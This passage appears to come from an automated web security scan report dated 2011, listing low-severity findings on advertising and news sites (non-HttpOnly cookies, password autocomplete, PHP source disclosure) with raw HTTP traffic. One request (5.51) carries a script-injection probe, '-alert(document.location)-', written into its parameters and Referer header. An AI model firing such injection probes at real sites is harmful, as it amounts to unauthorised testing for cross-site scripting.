Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6432&rnd1315831249 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266432%3D1%266286%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C56%2C4%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; put_2132=439524AE8C6B634E021F5F7802166020

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:40:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266432%3D1; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C120%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.48. http://rs.gwallet.com/r1/pixel/x420r5075003  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5075003

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5075003 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 11-Sep-2012 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=o5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 12-Sep-2016 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

5.49. http://usadmm.dotomi.com/dmm/servlet/dmm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000622%2C826000622%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1552553424%3Bs=403%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=1545%3Bsc=8%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 12 Sep 2011 12:48:27 GMT
X-Name: dmm-s02
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Wed, 11-Sep-2013 12:48:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Sat, 10-Sep-2016 12:48:27 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain


5.50. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s71862144072074

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s71862144072074?AQB=1&ndh=1&t=12%2F8%2F2011%2012%3A49%3A5%201%20300&pageName=%2F&g=http%3A%2F%2Fwww.mtv.co.uk%2F&r=http%3A%2F%2Fdrupal.org%2Fcases&ch=homepage&events=event16&c1=%2F&h1=index&c3=homepage&c4=not%20logged-in&c5=non-member&c16=homepage&c33=Monday&c34=5%3A30PM&c41=New&v45=Monday&v46=5%3A30PM&v49=homepage&s=1920x1200&c=16&j=1.6&v=Y&k=N&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:50:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFFD85149B5F-6000018C40017E3C|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 12:50:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:50:03 GMT
Last-Modified: Tue, 13 Sep 2011 12:50:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFFB-36A5-3043A8C4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www498
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.51. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s88215071307387

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s88215071307387?AQB=1&ndh=1&t=12%2F8%2F2011%2013%3A5%3A19%201%20300&pageName=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&g=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ch=generic&events=event16&h1=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&c3=generic&c4=not%20logged-in&c5=non-member&c16=generic&c33=Monday&c34=7%3A00PM&c41=New&v45=Monday&v46=7%3A00PM&v49=generic&s=1920x1200&c=16&j=1.7&v=Y&k=N&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava(TM)%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:05:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 13:05:02 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:05:02 GMT
Last-Modified: Tue, 13 Sep 2011 13:05:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E037E-2269-131ACF42"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www434
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

6. Password field with autocomplete enabled  previous  next
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...

6.2. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.3. http://www.fastcompany.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...

6.4. http://www.fastcompany.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.5. http://www.nowpublic.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...

7. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<link rel="stylesheet" type="text/css" href="<?=$path?>/newhome.css" />
...[SNIP]...

8. Referer-dependent response  previous  next
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



8.1. http://adserving.cpxinteractive.com/st  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserving.cpxinteractive.com
Path:   /st

Request 1

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
